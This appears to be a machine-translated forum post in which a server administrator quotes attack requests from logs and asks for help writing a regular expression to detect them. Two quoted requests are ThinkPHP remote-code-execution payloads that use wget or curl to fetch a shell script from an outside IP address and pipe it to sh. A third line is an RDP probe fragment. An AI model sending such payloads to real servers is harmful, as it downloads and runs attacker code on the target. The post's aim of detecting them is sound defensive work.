for example, the server has been attacked recently. Check and find that there are many such requests. I am not good. Ask all kinds of gods to help write regular expressions to match
.11:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20-q%20-O%20-%2082.146.58.234/p2.sh|sh
22:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%2082.146.58.234/p2.sh|sh
33:
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
I thank you here. Also by the way, greetings to the family members of Wuxi, Jiangsu, whose IP address is 27.203.3.136 and now IP address is 180.97.172.9, on January 6, 2019 in Weihai, Shandong Province.
mainly matches the above connection as long as it contains the words function or exec. The two keywords are the relationship between or (| |), not with (& &).